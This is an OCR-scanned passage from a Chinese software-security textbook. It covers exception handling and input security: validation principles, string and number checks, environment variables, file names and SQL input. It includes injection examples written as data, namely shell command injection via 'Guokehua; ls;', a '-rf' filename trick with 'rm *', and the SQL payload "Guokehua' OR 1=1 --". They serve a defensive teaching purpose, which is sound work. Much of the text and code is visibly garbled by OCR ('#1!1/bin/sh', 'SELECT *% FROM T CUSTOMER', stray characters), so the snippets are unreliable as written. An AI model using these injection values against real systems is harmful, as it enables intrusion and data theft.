在 要 处 理 多 种 异常 时 ,可 使 用 如 下 结构 : 


On Error GoTo handlel 
' 可 能 出 现 异常 的 代码 块 1 
On Error GoTo handle2 
' 可 能 出 现 异常 的 代码 块 2 


Exit Sub 
handlel: 

"处 理 异常 1 

Exit Sub 
handle2: 

' 处 理 异常 2 

Exit Sub 


End Sub 
End Module 


(3) 虽然 使 用 On Error GoTo 语句 比较 灵活 ,有 时 甚至 比 try-catch-finally 更 加 灵 
活 , 但 是 由 于 它 的 灵活 会 带 来 程序 结构 破坏 的 代价 ,并 且 降 低 了 程序 的 可 维护 性 ,因此 ， 
在 面向 对 象 的 语言 中 ,尽量 使 用 try-catch-finally 来 处 理 异常 。 


小 结 


本 章 对 异常 机 制 . 异 常 捕获 中 的 安全 问题 .异常 处 理 中 的 安全 问题 和 面向 过 程 异 常 
处 理 中 应 该 注意 的 要 点 进行 了 讲解 ,阐述 进行 良好 的 异常 处 理 , 是 系统 安全 的 一 个 重要 
保障 措施 。 应 该 指出 的 是 .安全 的 保证 可 能 需要 用 系统 开销 作 代价 ,本 章 中 针对 异常 的 
处 理 过 程 体现 了 这 个 思想 ,在 异常 处 理 的 过 程 中 .程序 员 必 须 在 安全 和 效率 之 间 找 到 
平衡 。 
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1. 完成 本 章 中 读 取 文 件 , 并 将 文件 中 的 字符 串 转 为 数值 案例 的 完整 代码 。 

2. 异常 可 以 就 地 处 理 , 也 可 以 向 客户 端 传递 。 

(1) 举 出 两 个 需要 向 客户 端 传递 异常 的 例子 ; 

(2) 举 出 两 个 可 以 就 地 处 理 异常 的 例子 。 

3. 用 VB. NET 实现 4. 1 中 的 案例 ,但 是 必须 用 面向 过 程 的 方法 和 面向 对 象 的 方 
法 来 处 理 异 常 ,比较 其 特点 。 

4. 有 一 个 try 块 放 在 for 循环 内 ,如 果 try 块 内 跳出 该 循环 ,finally 是 否 会 执行 ? 
试 编程 举例 。 

5. 设计 一 个 案例 ,实现 数据 库 打 开 、 访 问 .关闭 的 安全 代码 。 

6. 大 项 目 中 需要 处 理 多 种 不 同 种 类 异常 ,但 是 有 些 异 常 又 在 代码 中 重复 出 现 , 怎 
样 处 理 ? 

7. Java 中 ,Exception 和 Error 有 何 区 别 ? 

8. 什么 情况 下 需要 自 定义 异常 ? 

9. 编写 一 个 程序 ,客户 输入 一 个 数字 ,打印 其 平方 。 但 是 如 果 输 入 出 错 , 程 序 不 断 
提示 客户 重新 输入 ,直到 他 输入 正确 为 止 。 

10. C++ 中 的 异常 处 理 机 制 是 怎么 样 的 ? 
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输入 操作 是 用 户 和 软件 交互 的 手段 ,因此 ,输入 时 的 数据 安全 保证 显得 非常 重要 。 
本 章 针对 几 个 常见 的 输入 安全 问题 进行 讨论 。 

首先 是 传统 的 输入 问题 ,讲解 输入 安全 的 基本 概念 和 基本 意义 ; 然后 在 总 体 上 阐 
述 不 正确 输入 的 预防 措施 和 策略 。 接 下 来 针对 几 个 典型 问题 (数字 输入 安全 、 字 符 串 输 
入 安全 ,环境 变量 安全 等 ) 进 行 详细 讲解 ; 最 后 对 文件 名 安全 进行 阐述 。 

另外 ,本 章 还 讲解 了 数据 库 输 入 安全 的 若干 话题 。 首 先 对 数据 库 进行 了 简单 介绍 ， 
然后 针对 数据 库 的 恶意 输入 进行 了 分 析 , 并 提出 了 几 种 简单 的 解决 方案 ; 接 下 来 对 账 
户 和 口令 等 问题 进行 了 描述 ,也 提出 了 解决 的 方法 。 

不 过 ,在 实际 的 软件 工程 过 程 中 ,输入 方面 的 隐患 可 能 表现 在 很 多 方面 ,本 章 的 内 
容 不 可 能 涵盖 所 有 的 方面 ,因此 ,需要 用 户 针 对 具体 情况 提出 相应 的 解决 方案 。 


5.1 一 般 性 讨论 


5.1.1 输入 安全 概述 


输入 是 一 个 很 广泛 的 概念 ,既是 用 户 和 软件 之 间 的 交互 手段 ,也 是 软件 内 部 模块 之 
间 的 交互 手段 。 针 对 软件 用 户 的 输入 有 很 多 类 型 ,如 : 

。 用 户 在 软件 上 输入 一 个 命令 ,进行 相应 操作 ; 

。 用 户 输入 自己 的 账号 密码 ,进行 登录 验证 ; 

。 用 户 输入 一 个 关键 字 ,进行 查询 ,等 等 。 

模块 之 间 进 行 数据 传递 时 ,也 会 有 相应 输入 ,如 : 

。 一 个 模块 调用 另 一 个 模块 时 ,输入 一 些 参数 ; 

。 一 个 模块 读 取 一 个 配置 文件 来 对 自己 的 行为 进行 配置 ,等 等 。 

从 程序 本 身 的 角度 讲 , 很 多 情况 下 ,软件 的 安全 问题 就 出 在 输入 ; 从 攻击 者 的 角度 
:输入 是 进行 攻击 的 重要 手段 。 

经 过 调查 总 结 ,大 部 分 的 软件 安全 问题 来 源 于 应 用 程序 接收 输入 数据 前 ,没有 进行 


ee 
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安全 性 验证 。 
并 提示 ”这 里 所 说 的 安全 性 验证 ,不 仅仅 是 传统 的 合法 性 验证 。 传 统 的 合法 性 验 
证 只 是 需要 对 格式 是 否 合法 等 问题 进行 简单 的 验证 ,而 这 里 的 安全 性 验证 还 必须 针对 | 
安全 问题 进行 相应 的 检查 。 会 雁 
下 面 举 一 个 例子 来 说 明 这 个 问题 。 如 下 代码 ,是 一 个 Linux 的 Shell 彼 本 ,在 轩 区 于 
Linux 下 ,可 以 用 任意 编辑 器 编写 。 


hello. p 


#1!1/bin/sh 

echo "Please input your name:" 
read name 

eval echo Hello $ name 

echo How do You do? 

echo Good bye! 


将 该 代码 保存 在 Linux 下 ,并 赋予 执行 权限 ,然后 进入 Linux 的 Shell 命令 行 , 运 
行 该 程序 


$ ./hello.p 

Please input your name: 
Guokehua 

Hello Guokehua 

How do you do? 

Good bye 


上 面 的 斜体 Guokehua 表示 用 户 的 输入 。 从 上 面 的 内 容 可 以 看 出 ,输入 Guokehua 之 
后 ,程序 显示 : 


Hello Guokehua 
How do you do? 
Good bye 


运行 正常 。 但 是 该 程序 如 果 这 样 输入 : 


$ ./hello.p 
What’s your name 
Guokehua; 1s; 


则 显示 : 


Hello Guokehua 

cams. tar. gz hello.p helloapp.c hellod. cpp 
test1. cpp test.c test2. cpp test2.p 

How do you do? 

Good bye! 
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ls 是 Linux 中 列 出 当前 目录 下 所 有 文件 的 命令 。 从 上 面 的 结果 可 以 看 出 ,ls 命令 
在 输入 时 被 带 进去 了 ,这 样 ,程序 就 会 显示 当前 目录 下 的 所 有 文件 。 很 明显 ,如 果 任 由 
用 户 输入 而 不 进行 检查 ,用 户 就 可 以 输入 其 他 对 系统 有 害 的 命令 ,如 rm( 删 除 ) 命 令 , 那 
带 来 的 危害 是 巨大 的 。 

因此 ,该 代码 是 不 安全 的 。 

解决 上 面 问题 的 方法 显然 是 进行 安全 性 验证 。 一 句 话 ,对 于 编程 人 员 来 说 ,程序 的 


”所 有 输入 数据 ,在 进行 安全 性 验证 之 前 ,都 必须 被 认为 是 有 害 的。 一 旦 忽略 了 这 条 规 


验证。 


则 ,程序 就 可 能 遭受 攻击 。 

以 上 规则 说 起 来 很 容易 ,也 容易 理解 ,但 是 在 传统 情况 下 ,安全 性 验证 往往 被 忽略 。 
其 主要 原因 是 : 

(1) 在 同一 软件 中 ,由 于 每 一 个 输入 到 达 最 后 的 执行 模块 的 过 程 中 ,都 需要 经 过 许 
多 关口 ,每 个 关口 都 有 可 能 进行 检查 。 但 就 是 因为 这 样 , 许 多 的 开发 人 员 都 回避 对 输入 
的 检查 ,因为 他 们 一 般 假定 这 些 数据 在 通过 其 他 关口 时 ,已 经 由 其 他 关口 的 应 用 程序 函 
数 检查 过 了 ,他 们 不 愿意 牺牲 性 能 去 对 数据 进行 多 次 校 验 。 结 果 导 致 大 家 都 没有 进行 


提示 “实际 上 ,性 能 和 安全 性 相 比 ,显得 太 渺小 了 。 客 户 宁可 使 用 一 个 运行 较 慢 
而 安全 的 系统 ,也 不 会 使 用 一 个 响应 很 快 却 很 容易 受 攻击 的 系统 。 


(2) 随 着 软件 的 分 工 , 现 在 许多 应 用 程序 的 功能 都 分 块 分 布 在 不 同 的 机 器 上 (如 客 
户 机 器 和 服务 器 上 ,或 者 对 等 机 器 上 ) ,开发 人 员 有 充足 理由 依赖 应 用 程序 的 其 他 模块 


。 提供 安全 的 检验 。 


但 是 从 上 面 的 例子 又 可 以 看 出 ,输入 安全 解决 不 好 ,在 严重 的 情况 下 ,可 能 会 带 来 
巨大 的 危害 。 


提示。 下 面 给 出 一 个 输入 安全 的 案例 忠 。2003 年 7 月 ,计算 机 应 和 急 反应 小 组 协 


| 调 中 心 报告 了 Microsoft Windows 的 DirectX MIDI 库 中 一 组 危险 的 漏洞 。 


DirectX MIDI 库 是 用 于 播放 MIDI 格式 音乐 的 底层 Windows 库 。 但 是 这 个 库 没 
有 去 检查 MIDI 文件 中 的 所 有 数据 值 : 如 text、copyright 和 其 他 域 中 的 数据 ,而 用 户 如 
果 输 入 错误 的 值 , 则 可 能 导致 这 个 库 的 失效 。 


攻击 者 可 以 利用 这 一 漏洞 让 系统 去 执行 他 们 想 要 执行 的 任何 代码 。 其 方法 为 : 发 
布 一 个 网 页 , 当 用 户 察看 这 个 网 页 时 ,相当 于 用 户 在 执行 本 地 DirectX MIDI 库 中 的 内 
容 , 因 为 Internet Explorer 在 察看 一 个 包含 MIDI 文件 链接 的 网 页 时 ,会 自动 加 载 那个 
文件 并 播放 它 。 因 此 ,攻击 者 如 果 输 入 设计 足够 精巧 , 则 可 以 利用 这 个 库 的 漏洞 来 做 很 
多 事情 ,如 : 

。 删除 用 户 计 算 机 的 所 有 文件 ; 

。 将 用 户 的 一 些 机 密 文 件 通过 电子 邮件 发 送 到 攻击 者 的 邮箱 ， 

。， 让 机 器 崩溃 ,等 等 。 


5.1.2 预防 不 正确 的 输入 


很 明显 ,要 想 防御 应 用 程序 可 能 受到 的 输入 攻击 ,最 简单 且 最 有 效 的 方法 是 : 在 对 
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输入 进行 任何 一 步 处 理 之 前 ,必须 要 对 数据 安全 进行 验证 。 

数据 安全 验证 ,说 起 来 比较 容易 ,做 起 来 要 考虑 很 多 问题 。 并 且 就 是 因为 被 很 多 软 
件 开发 者 认为 太 容易 了 ,反而 会 忽略 科学 的 方法 。 

数据 安全 验证 的 一 般 步 又 如 下 : 

(1) 对 安全 的 输入 加 以 定义 。 

所 有 的 输入 设计 都 应 该 有 一 个 安全 定义 ,在 这 个 安全 定义 内 ,数据 被 认为 是 格式 正 


确 的 ,并 且 是 安全 的 。 输 入 的 数据 一 旦 符合 这 个 安全 定义 ,或 者 说 在 这 个 安全 定义 的 边 


界 内 ,就 认为 不 必要 进行 检查 了 。 


提示 “是 不 是 每 一 个 模块 上 都 要 进行 这 种 检查 呢 ? 一 般 情 况 下 ,是 的 。 我 们 建 
议 , 针 对 每 一 个 模块 的 输入 ,都 要 进行 针对 该 模块 功能 的 输入 性 检查 。 但 是 这 样 可 能 牺 
牲 一 部 分 系统 性 能 ,所 以 ,必须 在 应 用 程序 的 安全 和 性 能 之 间 寻 求 一 个 平衡 ,这 个 平衡 
一 般 由 数据 的 敏感 性 和 应 用 程序 操作 的 环境 来 决定 。 


(2) 对 输入 的 数据 ,针对 前 面 的 定义 进行 检查 。 一 般 情 况 下 ,可 在 对 任何 资源 的 访 


问 之 前 设置 一 个 检查 模块 ,对 输入 数据 进行 检查 。 设 计 过 程 中 ,如 果 输 入 数据 没有 经 过 
这 个 检查 模块 ,就 无 法 访问 资源 。 

可 以 设置 多 个 检查 模块 ,每 个 数据 源 ( 如 网 页 、 注 册 表 ,文件 系统 、 配 置 文 件 等 ) 都 有 
一 个 检查 模块 ,如 图 5-1 所 示 。 


提示 ”如果 机 器 上 有 些 模 块 要 进行 统一 的 检查 ,就 没有 必要 每 个 模块 进行 一 个 
检查 。 可 以 通过 一 些 手段 进行 统一 的 检查 。 比 如 ,在 Web 中 ,修改 资料 .查看 日 志 、 购 
买 物品 的 页 面 , 只 有 登录 成 功 之 后 才能 访问 ,要 对 某 些 页 面 进行 session 检查 ,来 决定 它 
们 是 否 能 够 被 请 求 。 这 时 可 以 在 每 个 页 面 上 编写 session 检查 的 代码 ,但 也 可 以 通过 过 
滤器 进行 解决 ,如 图 5-2 所 示 。 


入 
生 客户 六 
| 过 滤器 session 检 查 
检查 模块 | “| 检查 模块 检查 模块 1 
1 1 L | 1 | 
网 页 注册 表 配置 文件 | [ge 查看 日 志 购买 物品 
图 5-1 图 5-2 


在 对 输入 进行 检查 时 ,为 了 保证 实际 工作 的 可 行 性 ,在 设计 时 ,可 以 采用 以 下 几 个 
策略 : 


。 尽量 让 程序 可 以 输入 的 入 口 少 一 些 。 这 样 的 话 , 如 果 程 序 分 为 若干 个 模块 , 那 


么 攻击 者 直接 和 某 些 模块 通信 的 概率 大 大 减 小 ,也 就 是 说 ,攻击 者 进入 程序 的 
途径 将 大 大 减少 ,同时 也 限制 了 他 们 对 各 模块 之 间 的 通信 路 径 进 行 攻击 的 可 
能 。 安 全 验证 的 代价 大 大 减 小 。 

尽量 减少 允许 的 输入 类 型 。 这 样 可 以 让 验证 的 工作 更 加 简化 。 比 如 ,如 果 仅 仅 
允许 输入 的 值 为 数字 ,验证 时 只 需要 针对 数字 进行 验证 ,验证 是 相对 简单 的 ; 
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如 果 将 输入 设计 为 任何 字符 串 都 可 以 输入 ,那么 将 要 考虑 更 多 的 问题 ,验证 难 
度 会 增加 很 多 。 

严格 检查 不 可 信 的 输入 。 不 仅 在 数据 最 初 进入 程序 时 要 执行 检查 ,而且 在 程序 
实际 使 用 这 些 数据 时 ,也 要 进行 检查 。 当 然 , 检 查 的 项 目 可 以 不 一 样 ,但 是 检查 
应 该 是 时 时 存在 的 。 不 过 ,相对 来 说 ,更 重要 的 是 数据 在 使 用 之 前 的 检查 。 一 
般 情 况 下 ,可 以 采用 如 下 方法 : 一 个 数据 在 进入 模块 时 ,在 各 个 模块 内 进行 针 
对 该 模块 的 安全 检查 ,如 图 5-3 所 示 。 


数据 流 


模块 1 执行 检查 1 ” =| ”模块 2 执行 检查 2 | 


一 | | 一 模块 执行 检查 V | 一 | …… 


图 5-3 


转变 观念 ,从 定义 “非法 ”到 定义 “合法 ”"”。 安 全 程序 开发 人 员 往 往 有 个 误区 ,他 
们 首先 定义 的 是 “什么 样 的 数据 非法 ?”, 这 个 定义 很 容易 下 ,比如 ,在 E-mail 中 
可 以 定义 没有 @ 符 号 为 非法 ,但 是 这 是 不 安全 的 。 因 为 不 可 能 将 所 有 非法 的 数 
据 都 加 以 定义 ,攻击 者 常常 会 想 出 其 他 非法 数据 。 定 义 * 什 么 是 非法 ”, 容 易 想 
到 ,但 是 无 法 定义 全 ; 而 定义 “什么 是 合法 ”, 就 相对 容易 得 多 “正确 答案 只 有 
几 个 ,而 错误 答案 可 以 千 千 万 ,就 是 这 个 道理 。 

所 以 应 该 做 的 是 确定 “什么 样 的 数据 是 合法 的 ?”。 在 数据 输入 时 ,检查 数据 是 否 符 
合 定义 ,拒绝 所 有 不 符合 定义 的 数据 ; 而 不 是 检查 数据 是 否 不 符合 定义 ,接受 符合 定义 


的 数据 。 


例如 ,有 一 个 程序 ,根据 用 户 的 输入 ,创建 一 个 文件 。 很 显然 ,有 些 字符 ,如 /, 是 不 
允许 的 。 但 是 仅仅 去 检查 这 一 个 字符 也 不 够 ,其 他 字符 ,比如 ,控制 字符 、 空 格 、 横 线 等 ， 
都 有 可 能 不 合法 。 即 使 创建 了 一 个 “非法 "字符 的 列表 ,也 可 能 没有 办 法 定义 完全 ,因为 
总 可 能 有 没有 考虑 到 的 情况 。 

因此 ,正确 的 方法 应 该 是 : 确定 文件 名 输入 的 一 个 安全 的 特定 格式 ,而 拒绝 不 符合 


。 这 个 特定 格式 的 所 有 输入 。 


提示 。 定义 “什么 是 合法 的 ”, 实 际 上 让 定义 的 范围 小 了 很 多 ,使 安全 验证 更 加 容 
易 。 不 过 ,从 另 一 个 方面 讲 ,这 种 思想 会 导致 用 户 的 很 多 输入 都 被 认为 “不 合法 ”。 因 为 
毕竟 定义 “哪些 是 合法 的 ”, 可 能 让 可 以 接受 的 合法 数据 大 量 减少 。 但 是 基于 安全 考虑 ， 
有 时 这 不 失 为 一 个 好 办 法 。 


5s.2 几 种 典型 的 输入 安全 问题 


本 节 介 绍 几 种 常见 的 输入 安全 问题 。 不 过 .输入 安全 隐患 的 来 源 可 能 比较 多 , 因 


， 此 ,本 节 只 是 典型 问题 和 解决 经 验 的 列举 。 
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5.2.1 数字 输入 安全 问题 


数字 的 输入 安全 ,是 比较 常见 的 。 比 如 在 表单 上 输入 一 个 人 的 年 龄 ,一 般 就 会 有 范 
围 限 制 。 对 数字 的 安全 检查 主要 有 : 

。 格式 ,如 整数 .小 数 等 ; 

。 精度 ,如 小 数 保留 的 位 数 等 ; 

。 范围 ,如 某 个 输入 数字 的 大 小 取 值 范围 等 ; 

。 类 型 和 范围 的 匹配 ,如 为 了 预防 整数 溢出 ,对 短 整数 的 输入 进行 范围 检查 ， 


针对 数字 输入 的 安全 要 注意 以 下 几 点 : 
(1) 将 数字 格式 进行 确定 。 比 如 ,有 的 系统 中 数字 是 阿拉 伯 数 字 , 也 有 的 系统 支持 
中 文 数字 (如 一 、 二 、 三 ,甚至 壹 .起 、 佐 等) 输入 ,有 的 系统 中 数字 每 三 位 就 有 一 个 ,”, 等 


等 。 一 般 情况 下 ,可 以 用 正则 表达 式 来 进行 验证 字符 串 是 否 是 数字 ,然后 进行 数字 的 安 
全 检查 。 


> 提示 “在 编写 应 用 程序 的 过 程 中 ,经 常 要 判断 某 些 字符 串 是 否 符合 某 些 复杂 规 
则 ,正则 表达 式 就 是 用 于 描述 这 些 规则 的 工具 。 换 句 话 说 ,正则 表达 式 就 是 记录 和 帮助 
判断 文本 规则 的 代码 。 

例如 ,-[A 一 Za 一 z0 一 9] 十 名 指定 字符 串 至 少 为 一 个 字符 长 ,而 且 只 能 包括 大 写字 
母 .小 写字 母 和 阿拉 伯 数 字 0 一 9( 任 意 的 顺序 ); 

又 如 ,0\d{2) 一 \d{8}|0\d{3) 一 \d{7) 这 个 表达 式 能 匹配 两 种 以 -分 隔 的 电话 号 码 : 
一 种 是 3 位 区 号 ,8 位 本 地 号 (如 021-75487542), 另 一 种 是 4 位 区 号 ,7 位 本 地 号 (如 
0755-5678458) 。 

大 量 的 语言 ,如 CJava、Perl、Javascript 等 ,都 支持 正则 表达 式 ,它们 对 表达 式 的 定 
义 基 本 相同 ,但 是 也 有 细微 的 差别 。 

关于 正则 表达 式 , 读 者 可 以 针对 某 一 种 语言 ,参考 相关 文档 。 


(2) 对 于 负数 的 验证 。 一 般 最 好 不 要 根据 有 没有 符号 位 来 确定 该 数 是 不 是 负数 。 
因为 有 些 程序 中 ,如 果 输 入 一 个 很 大 的 正 数 ,也 可 能 导致 数值 溢出 ?而 变 成 一 个 负数 ， 
而 要 进行 一 些 底层 的 判断 。 

(3) 特别 要 注意 判断 数值 溢出 (如 整数 溢出 ) 的 问题 。 


5.2.2 字符 串 输入 安全 问题 


字符 串 输入 的 安全 性 ,也 是 很 重要 的 。 根 据 前 面 的 原则 ,一 般 情 况 下 ,要 确定 合法 
的 字符 串 ,拒绝 所 有 其 他 字符 串 ; 而 不 是 确定 非法 的 字符 串 .接受 所 有 其 他 字符 串 。 

同样 ,指定 合法 字符 串 最 简单 的 方法 是 使 用 正则 表达 式 ,这 种 情况 下 ,只 需要 正确 
使 用 正则 表达 式 ,描述 合法 字符 串 的 模式 ,判断 输入 的 字符 串 是 否 符合 这 个 模式 ,拒绝 ， 
不 符合 这 个 模式 的 数据 。 

关于 对 字符 串 的 验证 ,有 以 下 问题 值得 注意 : | 

(1) 如 果 使 用 正则 表达 式 ,最 好 明确 地 指出 要 匹配 数据 的 开始 (通常 用 -来 标识 ) 和 | 
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结束 (通常 用 $ 来 标识 ) ,否则 ,攻击 者 可 能 在 输入 中 嵌入 攻击 文本 ,并 且 能 够 绕 过 安全 
检查 。 

(2) 尽 可 能 在 输入 中 拒绝 特殊 字符 。 因 为 有 很 多 特殊 字符 在 某 些 系统 下 拥有 特殊 
的 含义 ,如 \, 在 Windows 系统 中 可 能 作为 文件 路 径 分 隔 符 。 在 开发 阶段 这 个 问题 可 能 
不 容易 引起 注意 ,但 是 可 能 会 被 攻击 者 利用 。 

这 些 字符 可 能 包括 以 下 几 类 : 

。 常规 特殊 字符 ,一 般 在 ASCII 码 表 内 ,如 $、%、@、* 、\0、\n 等 ,但 是 由 于 有 时 
候 会 用 来 表达 特定 含义 ,攻击 者 可 能 用 数字 代替 这 些 字符 来 进行 输入 ,达到 攻 
击 的 目的 。 

不 在 ASCII 码 表 内 .字符 值 大 于 127 的 国际 化 的 字符 ,也 可 能 会 有 许多 可 能 的 
含义 。 例 如 ,UTF-8 编码 的 字符 ,用 两 个 字 节 进行 编码 ,有 些 特 殊 字 符 也 可 以 
在 该 字符 集 里 进行 表达 ,尽量 不 要 使 用 。 

和 某 些 特定 应 用 有 关 的 或 者 字符 串 , 如 shell 中 的 命令 名 称 (rm、ls、mount)、 
SQL 中 的 关键 词 或 者 关键 字符 (如 select 注释 符号 --. 单 引号 .exec) 等 。 

在 程序 中 有 特定 含义 的 字符 ,如 某 些 系统 中 ,将 系统 的 配置 信息 用 “#” 隔 开 之 
后 保存 在 配置 文件 内 ,这 不 是 一 个 规定 ,但 是 可 由 软件 的 开发 者 在 程序 中 自行 
确定 ; 又 如 ,在 XML 和 HTML 中 用 二 和 二 表示 结 点 ,这 些 字 符 都 不 应 该 在 合 
法 范围 之 内 。 


5.2.3 环境 变量 输入 安全 问题 


在 操作 系统 中 ,环境 变量 是 交互 环境 (shell) 中 的 变量 ,在 该 交互 环境 下 运行 的 进 
程 ,可 以 访问 环境 变量 并 修改 其 值 。 

环境 变量 在 同一 个 交互 环境 下 只 有 一 个 实例 。 不 同 的 交互 环境 有 不 同 的 实例 , 互 
不 干扰 。 其 功能 是 用 于 影响 该 环境 下 进程 的 行为 。 

例如 ,在 Linux 中 ,输入 env 命令 ,就 可 以 看 到 系统 中 的 环境 变量 。 它 们 以 “变量 
名 一 值 ” 的 形式 出 现 。 

在 Windows 中 ,输入 set 命令 ,也 可 以 看 到 系统 中 的 环境 变量 ,如 图 5-4 所 示 。 


IC:\Docunents and Settings\hdministrator>set 

ALLUSERSPROFILE=C: \Docunents and Settin 

APPDATA=C: \Docunents and Settings\hdministratorNhppblication Dat 
ICLI ENTNAME=Console 

ICommnonProgranFiles=C:\Program Files\Comnon Files 


ICOMPUTERNAME=WWW-77085898ESF 
ComSpec=C: \WINDOWS \systen32\cmd.exe 
FP_NO_HOST_CHECK=NO 

HOMEDRIVE=C: 


图 5-4 


环境 变量 的 输入 可 能 给 攻击 者 带 来 机 会 。 主 要 来 源 于 : 

(1) 环境 变量 的 内 容 给 攻击 者 以 机 会 。 

有 些 系 统 中 ,环境 变量 存储 了 和 系统 有 关 的 一 些 配 置信 息 ,如 在 Linux 中 ,很 多 程 
序 配置 被 环境 变量 以 某 些 隐 含 ,模糊 或 未 公开 的 方式 所 定义 。 例 如 ,sh 和 bash shell 使 
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用 IFS 变量 来 决定 分 隔 命令 行 参 数 的 字符 。 那 么 ,在 执行 一 个 shell 时 ,把 IFS 设置 为 
某 些 值 , 就 可 能 进行 攻击 。 

另 一 方面 ,由 于 并 不 是 所 有 的 环境 变量 都 有 文档 的 说 明 , 这 让 用 户 遇 到 攻击 之 后 无 
所 适 从 ; 并 且 由 于 环境 变量 的 可 编辑 性 ,攻击 者 甚至 可 以 增加 一 些 更 加 危险 的 环境 变 
量 , 来 达到 攻击 的 目的 。 

(2) 环境 变量 的 存储 格式 给 攻击 者 机 会 。 在 Linux 下 ,环境 变量 在 底层 ,通常 是 以 | 
字符 串 数组 形式 存储 的 ,这 个 字符 串 指针 数组 有 一 个 头 指针 ,该 数组 中 , 按 顺 序 存储 各 
个 环境 变量 ,每 一 个 环境 变量 是 这 个 数组 中 的 一 个 元 素 , 该 数组 以 NULL 指针 结尾 。 
每 一 个 元 素 的 格式 都 为 NAME 一 value。 

这 就 潜在 地 说 明 ,环境 变量 名 不 能 包含 等 号 ,也 不 能 包含 一 些 其 他 敏感 符号 , 如 
NIL(ASCII 码 为 0 的 字符 ,一般 表示 一 个 字符 串 结尾 )。 但 是 如 果 这 一 点 被 攻击 者 利 
用 ,也 会 给 系统 带 来 损害 。 

实际 上 ,环境 变量 方面 的 安全 问题 还 有 很 多 ,读者 可 以 参考 相关 文档 。 

如 何 解决 以 上 安全 问题 ?可 从 以 下 几 个 方面 着 手 : 

。 限制 环境 变量 的 使 用 权限 ; 

。 可 适当 破坏 环境 变量 在 shell 之 间 的 共享 ; 

。 对 用 户 定义 的 环境 变量 ,需要 进行 严格 的 检查 。 

5.2.4 文件 名 安全 问题 

在 很 多 和 文件 输出 有 关 的 系统 中 ,文件 名 有 可 能 成 为 安全 隐患 。 无 论 在 什么 样 的 
操作 系统 中 ,文件 名 应 该 遵循 以 下 安全 准则 : 

(1) 最 好 不 要 让 用 户 来 自己 输入 文件 名 ,应 该 在 界面 上 给 用 户 一 个 默认 的 文件 名 。 
如 Windows 中 将 文件 男 存 时 ,界面 中 “文件 名 ” 框 中 ,会 显示 一 个 默认 的 合法 名 称 , 避 免 
用 户 因为 输入 一 些 不 合法 的 文件 名 造成 安全 问题 ( 见 图 5-5) 。 

提示 。 该 规则 主要 是 为 用 户 服务 的 ,对 于 攻击 者 是 没有 用 的 。 


保存 位 置 CQ): [Do 可 加 -本 总 X 已 本 -IO- 
ch05 


四] $chos. doe 
| ch0S. doc 


Ca] ZXHsm ER | 
保存 类 型 0): [rora 文档 G@. aoc) S| 取消 | 


图 5-5 
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(2) 如 果 不 得 不 让 用 户 输入 文件 名 ,那么 最 好 将 文件 名 限制 只 能 含有 字母 和 数字 。 
特别 应 该 考虑 将 一 些 特殊 字符 如 /\\\-、 和 通配符 (如 * 、?、[] 和 {)) 等 从 合法 模式 中 

例如 ,如 果 文 件 名 中 可 以 用 -, 有 一 个 文件 名 为 -rf, 那 么 在 UNIX/Linux 中 执行 合 
令 rm * ,将 会 变 成 执行 rm -rf。 这 实际 上 是 一 个 安全 隐患 。 

(3) 不 要 允许 用 户 命名 一 些 可 能 和 物理 设备 冲突 的 文件 名 。 比 如 ,在 一 些 系统 中 ， 
一 些 文件 名 可 以 被 认为 是 物理 设备 。 例 如 ,如 果 一 个 程序 试图 去 打开 COMI1 文件 ,可 


能 被 系统 误解 为 是 尝试 和 串口 通信 ,系统 就 去 进行 串口 的 读 写 ,而 该 操作 又 不 是 用 户 的 
| 期 望 。 因 此 ,该 种 文件 命名 也 要 避免 。 


5.3 数据库 输入 安全 问题 


5.3.1 数据 库 概述 


。 相关 文档 。 


数据 库 (Database,DB) ,顾名思义 ,是 存放 数据 的 地 方 。 在 计算 机 中 ,数据 库 包 括 
两 个 方面 的 含义 : 数据 本 身 和 数据 库 对 象 。 不 同 的 数据 库 产品 ,对 数据 都 有 不 同 的 定 
义 , 但 是 展现 给 用 户 的 数据 库 对 象 都 类 似 , 主 要 有 : 

。 表 (Table); 

。 视图 (View); 

。 存储 过 程 (Stored Procedure); 

。 触发 器 (Trigger) ,等 等 。 
其 中 , 表 是 最 常用 、 最 基本 的 数据 库 对 象 。 关 于 这 些 数据 库 对 象 的 定义 ,读者 可 以 参考 


数据 库 一 般 用 数据 库 管理 系统 (DBMS) 类 进行 管理 ,数据 库 管理 系统 是 用 于 管理 
数据 的 计算 机 软件 。 利 用 数据 库 管理 系统 ,用 户 能 方便 地 定义 和 操纵 数据 ,维护 数据 的 
安全 性 和 完整 性 ,以 及 进行 多 用 户 下 的 并 发 控制 和 恢复 数据 库 , 一 般 情况 下 ,人 们 所 说 
的 “数据 库 软件 ?就 是 指数 据 库 管理 系统 。 

目前 ,常用 的 数据 库 管 理 系统 有 Access、Oracle、Sybase、FoxPro、DB2、 Informix、 


。 SQL Server 等 ,它们 在 各 种 联机 事务 处 理 、 数 据 仓库 ,电子 商务 信息 管理 系统 决策 支 
。 持 系 统 \ 办 公 自 动 化 系统 、 企 业 资源 计划 、 网 站 建设 等 方面 都 有 着 广泛 的 应 用 。 木 节 接 


下 来 的 部 分 将 针对 输入 操作 对 数据 库 的 安全 问题 进行 讲解 。 


5.3.2 数据 库 的 恶意 输入 


攻击 者 通过 对 数据 库 的 恶意 输入 ,可 以 将 信息 注入 正在 运行 的 流程 ,获取 敏感 数 


。 据 ,其 至 危害 进程 的 运行 状态 。 


ix 提示“ 注意, 本章 所 说 的 恶意 输入 ,实际 上 在 应 用 中 ,可 以 用 于 SQL 注入 ,关于 


| SQL 注入 的 内 容 , 将 在 第 9 章 详细 讲解 。 
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例如 以 下 常见 代码 : 


String sql = "SELECT *% FROM T CUSTOMER WHERE NAME="" 
+ name 


二 mm 


变量 name 是 由 用 户 提供 。 这 个 SQL 语句 看 上 去 没有 问题 ,如 果 用 户 的 输入 为 
name 一 Guokehua, 它 将 创建 完整 .良好 的 SQL 语句 : 


SELECT * FROM T_ CUSTOMER WHERE NAME = 'Guokehua' 


这 很 正常 。 但 是 这 可 能 会 给 用 户 恶意 输入 的 机 会 。 该 SQL 语句 的 问题 在 于 攻击 
者 可 在 变量 name 中 植 人 SQL 语句 。 如 果 用 户 的 输入 为 : Guokehua' OR 1 二 1 --, 语 句 
变 为 : 


SELECT * FROM T_CUSTOMER WHERE NAME = 'Guokehua'OR 1=1 -——" 


这 条 语句 将 返回 表 T_CUSTOMER 列 NAME 值 为 Guokehua 的 行 ,或 者 所 有 满 | 
足 1==1 子 句 的 行 。 而 对 于 表 中 的 每 一 行 ,1 二 1 都 返回 true, 因 此 表 中 的 所 有 行 都 将 被 
